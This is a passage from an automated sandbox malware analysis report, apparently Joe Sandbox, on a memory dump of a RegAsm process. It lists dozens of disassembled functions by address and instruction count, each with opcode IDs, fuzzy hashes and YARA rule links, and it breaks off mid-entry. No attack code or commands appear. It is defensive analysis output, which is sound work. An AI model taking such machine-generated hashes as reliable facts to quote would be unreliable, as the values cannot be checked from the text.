                                                    • API String ID:
                                                    • Opcode ID: 0d62a59622d170feec60acd8e897f7334fe3b908f825a22b7c01ce42c166ee07
                                                    • Instruction ID: 80f1c689474562167a848d0dd19991c6656f6f4dbed46a069d6908062675793d
                                                    • Opcode Fuzzy Hash: 0d62a59622d170feec60acd8e897f7334fe3b908f825a22b7c01ce42c166ee07
                                                    • Instruction Fuzzy Hash: 0A1170B2A40615AFD722DF59C891BABB7E8EB44398F054429EA85CB210D735EC00CBA1
                                                    Function 02F6F2D0 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74a71f16bda7dc12227e49b361a67ea117bbc9c216442b327094c4be1910e564
                                                    • Instruction ID: 40b9fa0068e0edaab3079a48c859cef492132e24f6c6abb617cd3d518eaf56ae
                                                    • Opcode Fuzzy Hash: 74a71f16bda7dc12227e49b361a67ea117bbc9c216442b327094c4be1910e564
                                                    • Instruction Fuzzy Hash: B711C272A006489BC721DF69DC44BAEB7B8EF44B84F1800BAEA02E7651DB39D901CB50
                                                    Function 02FD72A0 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                    • Instruction ID: 2afa5ce9042db7ce90f4a154f41e05d7422259ffb153a9e41115a8eb5ded0bb5
                                                    • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                    • Instruction Fuzzy Hash: 54018C72140559BFD711AF66CC80E62F7AFFB947D5B440529F750465A0C722ACA0CFA4
                                                    Function 02F3A250 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                    • Instruction ID: 83a3e1cd7f7bc66f655df53002d64e715cd690fb6ff2abe89693b51df29601dc
                                                    • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                    • Instruction Fuzzy Hash: 7E01D272905B159BCB328F16D840A367BA5FF45BA07108A2DFED58B680D731D810CBA0
                                                    Function 02F46259 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d2f704dcb7f55fa9edb97af8efe279c4bd4c939c45ba91c48ef30aa361c36c62
                                                    • Instruction ID: 2d75b7bbf8b134193038e8a33d144ef54d136ebe6f147b96723a17ea475fffb5
                                                    • Opcode Fuzzy Hash: d2f704dcb7f55fa9edb97af8efe279c4bd4c939c45ba91c48ef30aa361c36c62
                                                    • Instruction Fuzzy Hash: 31117071A42228ABDF25EB64CC41FE9B3B9AF04750F5041D5A714E61E0DB70AE81CF94
                                                    Function 02FBE1D0 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25cdfe5a006de047946645a1e3886c33e2dde4ee114cf5eee6934c4ce93f1646
                                                    • Instruction ID: 60586437c43278279322310071f18018d544f53303b6a80b698ad583c3fa236a
                                                    • Opcode Fuzzy Hash: 25cdfe5a006de047946645a1e3886c33e2dde4ee114cf5eee6934c4ce93f1646
                                                    • Instruction Fuzzy Hash: 7711AD32A41240EFCB16EF59CD90F96BBB9FF44B98F2000A5EA059B661C775ED01CE90
                                                    Function 02F4208A Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                    • Instruction ID: bae8726f243984712f0391f4cf5ae4d84c17b06da73a638b15ddced81c267afe
                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                    • Instruction Fuzzy Hash: F9019233A001108BEF159A1DD880BA27BA6AFC4B94F5545A5FE05CF259DFB1A881C790
                                                    Function 02FC6050 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f11be0f53392ddfb63dac73a2f35b8f39a9e16b832408f26059376b13c27ba3
                                                    • Instruction ID: 9c0b95a1e8e3655761ce495bbc73bf0b9d51e520f5bef40b9c0c69b1c2c699f8
                                                    • Opcode Fuzzy Hash: 6f11be0f53392ddfb63dac73a2f35b8f39a9e16b832408f26059376b13c27ba3
                                                    • Instruction Fuzzy Hash: 42111B73900019ABCB11DB94CC84DDFBB7DEF48394F044166EA06E7210EA34AA14CBA0
                                                    Function 02F820F0 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e3ccf33b24e1de02aa6ea728cecc6bff4dca480574b929f91c23f0e77e03546
                                                    • Instruction ID: 7ef0b4aeb04b2a8d47d4ccef321939dde1dac18bb6624ffefb02b92ee0695f4a
                                                    • Opcode Fuzzy Hash: 8e3ccf33b24e1de02aa6ea728cecc6bff4dca480574b929f91c23f0e77e03546
                                                    • Instruction Fuzzy Hash: BD111E71A0124DABDB05EF64C851BAEBBB6AB44784F104059FA0597290D635A911CF91
                                                    Function 02F3C020 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                    • Instruction ID: 36ae0924b444f190150e368e29123b7082e5efb55d5e98245a313607252f789f
                                                    • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                    • Instruction Fuzzy Hash: 6D01B5726007449FEF22A66AC900BA777EAFFC47D4F15441AAB96CB650DF70E401CB60
                                                    Function 02F39353 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                    • Instruction ID: 209423ec56d8eed3a1a13dc37a8270988e8b7cd5e5d0de161ee7ccb7f690793e
                                                    • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                    • Instruction Fuzzy Hash: 4811ADB2900B12DFD7229F15C880B22B3E9BF407E6F15886CDA994B4A5C3B5E880CF10
                                                    Function 02F633A5 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                    • Instruction ID: eec2a7f6bb127218f6dcf29cc2b93dcc8312b1685eaf797b4a04e5e6df4e58d8
                                                    • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                    • Instruction Fuzzy Hash: D201D632700105A7CB129B9ACE04E6FBA6DDF84AC4B1404AABB06D7560EB31DD01CB60
                                                    Function 02F7D1D0 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                    • Instruction ID: 3db19ad08861f2236dd46366c23e60ba6388d36db4a29ab3dd6726addb062fe2
                                                    • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                    • Instruction Fuzzy Hash: 1D017B73B012049BD711DA64E800FA573A9DFD57A4F158157FF118F280DB34E802CB80
                                                    Function 02F3826B Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e394b280323df05e8da4fc2d8a5629f4b1aedcd74520702157b791aee9ee86e0
                                                    • Instruction ID: 3dee3652697155feb27d1241d490a3870887e749e885ac696f33a3abdf49e390
                                                    • Opcode Fuzzy Hash: e394b280323df05e8da4fc2d8a5629f4b1aedcd74520702157b791aee9ee86e0
                                                    • Instruction Fuzzy Hash: F601F732B10508DFCB05EB66DD409AF73BDFF813D4F154069AB0597240DE24DC01C691
                                                    Function 02F5E016 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                    • Instruction ID: 94002322e47cbf98b3cb517b6b7600ef007f2f7737e44afad5bd588c22d267b0
                                                    • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                    • Instruction Fuzzy Hash: D5015A326009949FE7228A1DC948F2677ECEF44BD4F0A04A5FF05CB691D778DD40C621
                                                    Function 02FFF367 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd3bf3383e91c112958c7eade66881a50d69f3641e9be1be73793de53d3a08fb
                                                    • Instruction ID: edc7f1c2e7dac410164a82d36c21dd3bc6ac731c71d2fccea0dbaabc31d31cfd
                                                    • Opcode Fuzzy Hash: cd3bf3383e91c112958c7eade66881a50d69f3641e9be1be73793de53d3a08fb
                                                    • Instruction Fuzzy Hash: 16018471A00258ABD710EBA9D845FAEBBB8EF44744F004066F601EB390D6B4D900CB94
                                                    Function 0300972B Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                    • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                    • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                    • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                    Function 03015636 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62536ddae4082df5772da0ee9c741f8c459d189510d998c3142756a1ad6ab514
                                                    • Instruction ID: bd81be5d9863a44866bec64bdc815650eac869138717b2ec301ac7b33d2613df
                                                    • Opcode Fuzzy Hash: 62536ddae4082df5772da0ee9c741f8c459d189510d998c3142756a1ad6ab514
                                                    • Instruction Fuzzy Hash: 60116D74D10259EFCB04EFA8D441A9EB7B4EF08704F14845AB915EB350E734DA02CBA4
                                                    Function 02F3C310 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                    • Instruction ID: 7ad82d19800d31583814b0165b59658a96d66bf3130b010ee9ba92be3bca5f2b
                                                    • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                    • Instruction Fuzzy Hash: 01F09673645A329BD73356694C40B6BB6968FC5BE4F1A0037E709FB244CE748C029BD5
                                                    Function 03015152 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f7200fc206cad54db72b09e999a71ad7c1692ebb96848b847722a3c58c98d15
                                                    • Instruction ID: 8239dd57dbe761f00f5a10925cdc98a9ffcf9cdce9321e558a825ec40f088cf8
                                                    • Opcode Fuzzy Hash: 9f7200fc206cad54db72b09e999a71ad7c1692ebb96848b847722a3c58c98d15
                                                    • Instruction Fuzzy Hash: 70017CB1A1124DABDB00DFA9D9419EEBBF8EF89744F10005AFA01E7340D734EA018BA0
                                                    Function 02F6C073 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                    • Instruction ID: 23c392ab13da4d241528a7b89ad9192986a36489f76709c29c964f6abb81b084
                                                    • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                    • Instruction Fuzzy Hash: 1FF0AFB2A00610ABD325CF4DDC40E67F7EADFC0A80F048129A645C7220EA31ED04CB90
                                                    Function 03015060 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbf1794cf52f26598c3f55620bfdd7bddc3a1670c72c5ec60e9fbd9fa47807d2
                                                    • Instruction ID: dc06e8f02882cf50f2c6f188334fda79387d405bf18586fc9bfe9b0f3296db6b
                                                    • Opcode Fuzzy Hash: cbf1794cf52f26598c3f55620bfdd7bddc3a1670c72c5ec60e9fbd9fa47807d2
                                                    • Instruction Fuzzy Hash: 1F017171A0121D9BCB00EFA9D9419EEB7F8EF49744F10405AFA01E7341D634E9018BA0
                                                    Function 030150D9 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec8f782b48ff2f59ace6c113281f9faa2ae0b3f6716ec3e20c47937c616367d6
                                                    • Instruction ID: 0961a805d0baed3f0389cd27f2956101661320dec99fab2f2bc7ff70abbeaa8d
                                                    • Opcode Fuzzy Hash: ec8f782b48ff2f59ace6c113281f9faa2ae0b3f6716ec3e20c47937c616367d6
                                                    • Instruction Fuzzy Hash: 3C012CB1A0121DABCB00DFA9D9419EEB7F8EF49744F50405AFA01F7390D674E9018BA4
                                                    Function 02F75734 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                    • Instruction ID: 3526ea575e5308d330d942302757b743aee243720d3aac512a794aa679c94359
                                                    • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                    • Instruction Fuzzy Hash: A3F0F472901218AFE319CF5CC840F5AB7EDDB45694F05406ADA00DF230D771EE05CA94
                                                    Function 02FFF78A Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 815d75532e54da999e6692474a769d6cc8d93989c34a2f321a0991c631bd5fe6
                                                    • Instruction ID: bf8637b5d712e5f8fc8cd3bb36e4ae6ab418926c94396e196f589a31ad693ff3
                                                    • Opcode Fuzzy Hash: 815d75532e54da999e6692474a769d6cc8d93989c34a2f321a0991c631bd5fe6
                                                    • Instruction Fuzzy Hash: E501EDB5E0024D9FCB44DFA9D545A9EB7F4AF08344F104055AA15E7391E674DA00CB51
                                                    Function 02FFF2F8 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf08b762ad10b45f5ce5787dc318277e5d846c272b8fbf2bc01131684221b4bc
                                                    • Instruction ID: f3e46e3037ce7182bf603844b5dbf5a517cbc05b77e7093de3d88f3bcf35da08
                                                    • Opcode Fuzzy Hash: bf08b762ad10b45f5ce5787dc318277e5d846c272b8fbf2bc01131684221b4bc
                                                    • Instruction Fuzzy Hash: 02F0C872F10258ABD704EFB9C845AEEB7B9EF44754F008096F701E72D0DA74D9018B61
                                                    Function 02FC63C0 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                    • Instruction ID: b7d9645bdcb28d72d22f431ac268752bd4102b9dc41db9ab05fc9a1f426666c1
                                                    • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                    • Instruction Fuzzy Hash: 9BF0FF7210401DBFEF019F94DD80DAF7B6EEB457D8B104165BA11A2160D635DD21ABA0
                                                    Function 030161E5 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b4641168f0ffd5d8be2ab22f5a02ea0acd48ca704358f09085b6eb2e1865d36
                                                    • Instruction ID: a36da9eeb1ab810ce84f643f43ab6310a255dad6c405c0bc821c1ba1eed18bc0
                                                    • Opcode Fuzzy Hash: 6b4641168f0ffd5d8be2ab22f5a02ea0acd48ca704358f09085b6eb2e1865d36
                                                    • Instruction Fuzzy Hash: 74018F71A0125D9BCB00EFA9D841AEEF7F8BF48754F14005AFA01A7380D778EA01CBA4
                                                    Function 02F7724D Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                    • Instruction ID: 64f7c689430d3f1fdfca44df6d83255fd07f85660212d6ec368cff332836070c
                                                    • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                    • Instruction Fuzzy Hash: 05F0FC76E212556BDB10F7598940FAAFBA99F90754F054157BF11A7140D730E940CE50
                                                    Function 030153FC Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50ebc821752f847b47e6fa5d51ac4a92f4482341f84882b3daf5555189a513d4
                                                    • Instruction ID: 23ea5ca1269475f92786553d58f667b4f36d7a22c2e71f1538bcc3a8a861ed9d
                                                    • Opcode Fuzzy Hash: 50ebc821752f847b47e6fa5d51ac4a92f4482341f84882b3daf5555189a513d4
                                                    • Instruction Fuzzy Hash: F9015E70E012099FDB04DFA9C841B9EF7F4FF08344F1481A5A519EB381EA749A008B90
                                                    Function 02F3C0F0 Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31cd9614ac80152ce3587151f680e937cd16eb26d0dc3df252ea5f0f4d907128
                                                    • Instruction ID: dc27f0efa6dbecbd37d364ee4aff1e4a1f8cd32f28ea23e25cef1f8cd8904f21
                                                    • Opcode Fuzzy Hash: 31cd9614ac80152ce3587151f680e937cd16eb26d0dc3df252ea5f0f4d907128
                                                    • Instruction Fuzzy Hash: 22F0B4727442015BF716B6199C11B23739AEBE07E5FA5806BEB099B3D0EB71DC01C794
                                                    Function 03013749 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                    • Instruction ID: 65a0ccf44a7e87486d3b03e0b26a8b634851caba0089d34e3c0dc17b16573929
                                                    • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                    • Instruction Fuzzy Hash: 10F04FB6940244BFE721EB64CD41FDAB7FCEB04750F0001A6AA16D6190EA70EA44CF90
                                                    Function 02FE437C Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
